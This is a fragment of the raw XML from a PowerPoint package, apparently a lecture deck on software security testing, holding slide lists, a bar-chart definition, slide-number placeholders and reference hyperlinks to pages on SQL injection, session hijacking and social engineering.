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1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="397" r:id="rId2"/>
    <p:sldId id="39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96" r:id="rId52"/>
    <p:sldId id="307" r:id="rId53"/>
    <p:sldId id="308" r:id="rId54"/>
    <p:sldId id="309" r:id="rId55"/>
    <p:sldId id="310" r:id="rId56"/>
    <p:sldId id="311" r:id="rId57"/>
    <p:sldId id="312" r:id="rId58"/>
    <p:sldId id="313" r:id="rId59"/>
    <p:sldId id="314" r:id="rId60"/>
    <p:sldId id="315" r:id="rId61"/>
    <p:sldId id="393" r:id="rId62"/>
    <p:sldId id="317" r:id="rId63"/>
    <p:sldId id="318" r:id="rId64"/>
    <p:sldId id="394"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92"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 id="359" r:id="rId107"/>
    <p:sldId id="360" r:id="rId108"/>
    <p:sldId id="361" r:id="rId109"/>
    <p:sldId id="362" r:id="rId110"/>
    <p:sldId id="363" r:id="rId111"/>
    <p:sldId id="364" r:id="rId112"/>
    <p:sldId id="367" r:id="rId113"/>
    <p:sldId id="365" r:id="rId114"/>
    <p:sldId id="366" r:id="rId115"/>
    <p:sldId id="368" r:id="rId116"/>
    <p:sldId id="369" r:id="rId117"/>
    <p:sldId id="370" r:id="rId118"/>
    <p:sldId id="371" r:id="rId119"/>
    <p:sldId id="372" r:id="rId120"/>
    <p:sldId id="373" r:id="rId121"/>
    <p:sldId id="395" r:id="rId122"/>
    <p:sldId id="375" r:id="rId123"/>
    <p:sldId id="376" r:id="rId124"/>
    <p:sldId id="377" r:id="rId125"/>
    <p:sldId id="378" r:id="rId126"/>
    <p:sldId id="379" r:id="rId127"/>
    <p:sldId id="380" r:id="rId128"/>
    <p:sldId id="381" r:id="rId129"/>
    <p:sldId id="382" r:id="rId130"/>
    <p:sldId id="383" r:id="rId131"/>
    <p:sldId id="384" r:id="rId132"/>
    <p:sldId id="386" r:id="rId133"/>
    <p:sldId id="391" r:id="rId1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1158" y="10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rAngAx val="1"/>
    </c:view3D>
    <c:floor>
      <c:thickness val="0"/>
    </c:floor>
    <c:sideWall>
      <c:thickness val="0"/>
    </c:sideWall>
    <c:backWall>
      <c:thickness val="0"/>
    </c:backWall>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="6.9112314085739313E-2"/>
          <c:y val="8.3268126640419979E-2"/>
          <c:w val="0.91560990813648302"/>
          <c:h val="0.84940575787401573"/>
        </c:manualLayout>
      </c:layout>
      <c:bar3DChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 3</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spP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cat>
            <c:numRef>
              <c:f>Sheet1!$A$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>9.8000000000000007</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 10</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:showLegendKey val="0"/>
              <c:showVal val="0"/>
              <c:showCatName val="0"/>
              <c:showSerName val="1"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}"/>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c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>14</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 100</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spP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cat>
            <c:numRef>
              <c:f>Sheet1!$A$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>40</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$E$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 500</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spP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cat>
            <c:numRef>
              <c:f>Sheet1!$A$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$E$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>79</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$F$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 1000</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spP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cat>
            <c:numRef>
              <c:f>Sheet1!$A$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$F$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>91</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Top 10000</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spP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cat>
            <c:numRef>
              <c:f>Sheet1!$A$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$G$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>98.8</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="300"/>
        <c:shape val="box"/>
        <c:axId val="344754120"/>
        <c:axId val="344756080"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="344754120"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="344756080"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="344756080"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="34475412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971A67-42F9-4FBD-BDA1-A13A2E1DDB27}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/13/2014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DCE282-E14E-4978-B1B5-29107FE57A08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790008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www.slideshare.net/amiable_indian/advanced-topics-on-sql-injection-protection"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www.scribd.com/doc/54228526/7/Password-Attacks"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www.snapfiles.com/screenshots/fbpwgen.htm"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en.kioskea.net/contents/attaques/manipulation-url.php3"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www.slideshare.net/leminhvuong/module-6-session-hijacking"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www.slideshare.net/leminhvuong/module-6-session-hijacking" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/amansyal/session-hijacking-by-rahul-tyagi"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www.slideshare.net/leminhvuong/module-6-session-hijacking"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www.slideshare.net/leminhvuong/module-6-session-hijacking"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www.slideshare.net/leminhvuong/module-6-session-hijacking"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www.slideshare.net/leminhvuong/module-6-session-hijacking"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www.slideshare.net/leminhvuong/module-6-session-hijacking" TargetMode="External"/><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www.slideshare.net/washal/social-engineeringcase-study" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide109.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Social_engineering_(security)" TargetMode="Externa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www.slideshare.net/abercius24/social-engineering-e"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www.slideshare.net/abercius24/social-engineering-e"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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/abercius24/social-engineering-e"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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/abercius24/social-engineering-e" TargetMode="External"/><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www.slideshare.net/niharsarangi/cryptography" TargetMode="External"/><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www.slideshare.net/niharsarangi/cryptography" TargetMode="External"/><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www.slideshare.net/niharsarangi/cryptography" TargetMode="External"/><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Advanced Software Testing Vol. 1</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6774582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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3862885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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584148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Software Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Ron Patton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2799465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Software Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Ron Patton</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1571829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Software Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Ron Patton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6937119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Software Testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Ron Patton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39414736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t>SoftwareSecurityTesting.ppt</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13068890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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3033993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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8978587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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3595563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Advanced Software Testing Vol. 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22857210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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42483088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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41726130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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41931785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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5367847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mtClean="0"/>
              <a:t>SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6FB4F6EA-423E-42DF-9292-215E7D886C4E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8425000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SoftwareSecurityTesting.ppt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
